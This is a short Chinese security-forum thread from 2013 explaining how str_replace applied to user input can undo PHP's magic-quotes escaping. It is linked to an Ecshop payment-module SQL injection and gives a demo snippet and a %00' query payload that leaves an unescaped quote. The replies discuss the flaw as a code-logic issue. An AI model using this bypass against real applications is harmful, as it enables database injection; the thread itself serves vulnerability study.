str_replace函数绕过GPC的例子 -- WooYun(白帽子技术社区) -- 网络安全资讯、讨论，跨站师，渗透师，结界师聚集之地又一个有意思的地方

当前位置：WooYun(白帽子技术社区) >> php >> str_replace函数绕过GPC的例子

str_replace函数绕过GPC的例子

| 2013-02-20 12:50

Ecshop支付模块注入那个漏洞

<?php $test=str_replace($_GET['a'],'',$_GET['b']); echo $test; ?>

test.php?a=&b=%00'

\0\'

把0给替掉

test.php?a=0&b=%00' \\'

分享到：

10 个回复

1#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

xsser (十根阳具有长短!!) | 2013-02-20 12:59

茄子大神发现的啊？
2#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

rayh4c | 2013-02-20 13:11

@xsser .... 微博上看人说，就试了下。
3#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

livers (如梦似幻) | 2013-02-20 13:44

我更认为这算是代码逻辑问题。
4#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

无敌L.t.H (‮……天百一爱恋考高：簿相色白产国) | 2013-02-20 14:02

没见过这样替换的
5#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

Seay (x) | 2013-02-20 16:17

具体漏洞分析http://www.cnseay.com/archives/2237 昨晚写的
6#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

Xhm1n9 | 2013-02-20 16:19

这种写法有点奇葩
7#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

magerx (为什么要去争论。) | 2013-02-20 16:36

\0 真不错。
8#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2013-02-20 17:02

http://t.qq.com/hi_heige
9#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

请叫我大神 | 2013-02-20 18:01

@rayh4c 又见茄子
10#
回复此人感谢
"感谢"将向此回复作者赠送1个乌云币。

horseluke (微碌) | 2013-02-20 18:04

@Seay 话说，在respond()之前，$_GET有没有作安全处理？
如果有的话，Taint扩展（https://github.com/laruence/php-taint ）估计就没法检出来了...
同意3#说的代码逻辑问题

str_replace函数绕过GPC的例子

添加新回复

WooYun(白帽子技术社区)

其它内容